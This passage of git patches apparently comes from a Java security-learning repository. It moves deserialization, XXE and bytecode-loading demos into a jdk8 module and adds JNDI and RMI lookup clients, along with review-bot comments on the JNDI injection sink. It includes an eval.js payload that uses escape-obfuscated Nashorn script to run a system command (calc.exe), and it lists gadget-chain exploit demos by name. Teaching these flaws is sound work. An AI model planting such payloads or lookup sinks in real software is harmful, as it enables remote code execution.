+ env.put(Context.SECURITY_PRINCIPAL, "user");
+ env.put(Context.SECURITY_CREDENTIALS, "password");
+ env.put(Context.PROVIDER_URL, "ldap://127.0.0.1:389");
+ InitialContext ctx = new InitialDirContext(env);
+ ctx.lookup("sample");
+ ctx.close();
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/client/RMIClient.java b/jdk8/src/main/java/com/govuln/client/RMIClient.java
new file mode 100644
index 0000000..00c6ef2
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/client/RMIClient.java
@@ -0,0 +1,9 @@
+package com.govuln.client;
+
+import java.rmi.Naming;
+
+public class RMIClient {
+ public static void main(String[] args) throws Exception {
+ Naming.lookup("rmi://localhost:1099/test");
+ }
+}
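Review bot: `initialContext.lookup("ldap://127.0.0.1:389/sample")` is the JNDI-injection sink shape — a full URL passed to `InitialContext.lookup` selects the provider from the scheme, so whatever directory answers at that address decides what this side resolves and deserializes — and a header comment should say that this behaviour is the thing being demonstrated, not a pattern to reuse; whether a remote codebase is actually loaded depends on the JDK level (since 8u191, as I recall, `com.sun.jndi.ldap.object.trustURLCodebase` defaults to false), which is worth stating next to it. The imports of `InitialDirContext`, `InitialLdapContext` and `Hashtable` are unused and can be dropped.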
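Review bot: The bind uses `"simple"` authentication against a plain `ldap://` URL, so the `SECURITY_PRINCIPAL`/`SECURITY_CREDENTIALS` pair travels in cleartext; acceptable against a local test server, but the example should say so: `// simple bind over ldap:// sends the password in the clear; use ldaps:// or StartTLS outside a lab`. `ctx.close()` is skipped when `lookup` throws — wrap it as `try { ctx.lookup("sample"); } finally { ctx.close(); }`. The raw `Hashtable` could be `Hashtable<String, String>` so the diamond has something to infer from.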
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollections1.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollections2.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollections3.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java
diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/JDK7u21.java
rename to jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java
diff --git a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java b/jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java
rename to jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java
diff --git a/general/src/main/java/com/govuln/deserialization/URLDNS.java b/jdk8/src/main/java/com/govuln/deserialization/URLDNS.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/URLDNS.java
rename to jdk8/src/main/java/com/govuln/deserialization/URLDNS.java
diff --git a/jdk8/src/main/java/com/govuln/js/Eval.java b/jdk8/src/main/java/com/govuln/js/Eval.java
new file mode 100644
index 0000000..6c11506
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/js/Eval.java
@@ -0,0 +1,20 @@
+package com.govuln.js;
+
+import javax.script.ScriptEngine;
+import javax.script.ScriptEngineManager;
+import java.io.FileReader;
+
+import jdk.nashorn.api.scripting.NashornException;
+import jdk.nashorn.api.scripting.NashornScriptEngine;
+import jdk.nashorn.api.scripting.NashornScriptEngineFactory;
+
+import java.io.InputStream;
+import java.lang.Exception;
+
+public class Eval {
+ public static void main(String[] args) throws Exception {
+ ScriptEngineManager manager = new ScriptEngineManager();
+ ScriptEngine engine = manager.getEngineByName("JavaScript");
+ engine.eval(new FileReader("src/main/resources/eval.js"));
+ }
+}
diff --git a/general/src/main/java/com/govuln/serialization/Converter.java b/jdk8/src/main/java/com/govuln/serialization/Converter.java
similarity index 100%
rename from general/src/main/java/com/govuln/serialization/Converter.java
rename to jdk8/src/main/java/com/govuln/serialization/Converter.java
diff --git a/general/src/main/java/com/govuln/serialization/UserSerialization.java b/jdk8/src/main/java/com/govuln/serialization/UserSerialization.java
similarity index 100%
rename from general/src/main/java/com/govuln/serialization/UserSerialization.java
rename to jdk8/src/main/java/com/govuln/serialization/UserSerialization.java
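Review bot: `engine.eval(new FileReader("src/main/resources/eval.js"))` in Eval.main never closes the reader and reads it in the platform default charset, and the relative path only resolves when the JVM is started from the jdk8 module directory; `try (FileReader reader = new FileReader("src/main/resources/eval.js")) { engine.eval(reader); }` fixes the leak and a comment should state the expected working directory. The three `jdk.nashorn.api.scripting` imports, `java.io.InputStream` and the redundant `java.lang.Exception` import are all unused. A header comment is also worth adding: an engine obtained via `getEngineByName("JavaScript")` hands the script the full Java class library, and `NashornScriptEngineFactory.getScriptEngine(ClassFilter)` is the supported way to restrict which classes a script may touch, which may be what the unused factory import was intended for.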
diff --git a/general/src/main/java/com/govuln/serialization/model/User.java b/jdk8/src/main/java/com/govuln/serialization/model/User.java
similarity index 100%
rename from general/src/main/java/com/govuln/serialization/model/User.java
rename to jdk8/src/main/java/com/govuln/serialization/model/User.java
diff --git a/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java b/jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java
similarity index 100%
rename from general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java
rename to jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java
diff --git a/general/src/main/java/com/govuln/xxe/SAXParserExample.java b/jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java
similarity index 100%
rename from general/src/main/java/com/govuln/xxe/SAXParserExample.java
rename to jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java
diff --git a/general/src/main/java/com/govuln/xxe/XMLReaderExample.java b/jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java
similarity index 100%
rename from general/src/main/java/com/govuln/xxe/XMLReaderExample.java
rename to jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java
diff --git a/general/src/main/java/com/govuln/xxe/XMLStreamExample.java b/jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java
similarity index 100%
rename from general/src/main/java/com/govuln/xxe/XMLStreamExample.java
rename to jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java
diff --git a/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java b/jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java
similarity index 100%
rename from general/src/main/java/com/govuln/xxe/XPathExpressionExample.java
rename to jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java
diff --git a/general/src/main/java/evil/EvilTemplatesImpl.java b/jdk8/src/main/java/evil/EvilTemplatesImpl.java
similarity index 100%
rename from general/src/main/java/evil/EvilTemplatesImpl.java
rename to jdk8/src/main/java/evil/EvilTemplatesImpl.java
diff --git a/general/src/main/java/evil/Hello.java b/jdk8/src/main/java/evil/Hello.java
similarity index 100%
rename from general/src/main/java/evil/Hello.java
rename to jdk8/src/main/java/evil/Hello.java
diff --git a/jdk8/src/main/resources/eval.js b/jdk8/src/main/resources/eval.js
new file mode 100644
index 0000000..f80f6b6
--- /dev/null
+++ b/jdk8/src/main/resources/eval.js
@@ -0,0 +1,4 @@
+var a = new java.beans.Customizer {
+ setObject: eval
+}
+a.object = "java.lang.Runtime.getRuntime\50\51.exec\50'calc.exe'\51";
\ No newline at end of file
From 9573c899d8a9b7328addef596c85aefedcd722cb Mon Sep 17 00:00:00 2001
From: phith0n
Date: Wed, 9 Apr 2025 20:02:05 +0800
Subject: [PATCH 35/35] rename folder name
---
 README.md | 26 +++++++++++++-------------
 1 file changed, 13 insertions(+), 13 deletions(-)
diff --git a/README.md b/README.md
index d6a7031..870ec80 100644
--- a/README.md
+++ b/README.md
@@ -29,22 +29,22 @@ 字节码: -- 远程字节码加载Demo:[HelloClassLoader](general/src/main/java/com/govuln/bytes/HelloClassLoader.java) -- 系统默认defineClass加载字节码Demo:[HelloDefineClass](general/src/main/java/com/govuln/bytes/HelloDefineClass.java) -- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) -- 使用BCEL加载字节码Demo:[HelloBCEL](general/src/main/java/com/govuln/bytes/HelloBCEL.java) +- 远程字节码加载Demo:[HelloClassLoader](jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java) +- 系统默认defineClass加载字节码Demo:[HelloDefineClass](jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java) +- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) +- 使用BCEL加载字节码Demo:[HelloBCEL](jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java) 反序列化: -- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) -- 我简化的[CommonsCollections6](general/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 -- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) -- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) -- 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) -- CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) -- 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) -- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) -- 简化版Java原生利用链 [JDK7u21](general/src/main/java/com/govuln/deserialization/JDK7u21.java) +- 
最简单的Transformer Demo:[CommonsCollectionsIntro.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) +- 我简化的[CommonsCollections6](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 +- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) +- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) +- 我简化的[CommonsCollections3](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java) +- CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) +- 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) +- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 简化版Java原生利用链 [JDK7u21](jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java) Shiro反序列化: